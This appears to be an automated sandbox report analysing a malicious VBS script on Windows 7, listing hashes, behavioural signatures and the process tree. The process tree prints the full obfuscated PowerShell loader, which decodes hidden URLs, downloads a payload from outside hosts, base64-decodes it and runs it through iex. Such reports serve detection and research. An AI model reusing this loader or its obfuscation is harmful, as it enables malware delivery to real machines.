Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
03-07-2024 03:02
Static task
static1
Behavioral task
behavioral1
Sample
bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3.vbs
Resource
win10v2004-20240508-en
General
-
Target
bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3.vbs
-
Size
22KB
-
MD5
af8e905368962cfb4873c41a77b4515c
-
SHA1
577337de5d106e6b11225be7c362f33a8d5c0831
-
SHA256
bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
-
SHA512
8fca68d732a9db1a4a6d9b955a361a5bd37bdd7c994e9094b31799cc7c4c6448fc620d2bf8928532a261680c78e8e138f0b960d9fa630dfc0b4e51c7e756a9c2
-
SSDEEP
384:KlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwfEa+MCq22HX:6zSR022X/523S0e8xPPmra+Mq01N
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2620 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 788 wrote to memory of 2620 788 WScript.exe powershell.exe PID 788 wrote to memory of 2620 788 WScript.exe powershell.exe PID 788 wrote to memory of 2620 788 WScript.exe powershell.exe PID 2620 wrote to memory of 2700 2620 powershell.exe cmd.exe PID 2620 wrote to memory of 2700 2620 powershell.exe cmd.exe PID 2620 wrote to memory of 2700 2620 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2620-4-0x000007FEF59EE000-0x000007FEF59EF000-memory.dmpFilesize
4KB
-
memory/2620-6-0x0000000002910000-0x0000000002918000-memory.dmpFilesize
32KB
-
memory/2620-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmpFilesize
2.9MB
-
memory/2620-7-0x000007FEF5730000-0x000007FEF60CD000-memory.dmpFilesize
9.6MB
-
memory/2620-8-0x000007FEF5730000-0x000007FEF60CD000-memory.dmpFilesize
9.6MB
-
memory/2620-9-0x000007FEF5730000-0x000007FEF60CD000-memory.dmpFilesize
9.6MB
-
memory/2620-10-0x000007FEF5730000-0x000007FEF60CD000-memory.dmpFilesize
9.6MB
-
memory/2620-11-0x000007FEF59EE000-0x000007FEF59EF000-memory.dmpFilesize
4KB
-
memory/2620-12-0x000007FEF5730000-0x000007FEF60CD000-memory.dmpFilesize
9.6MB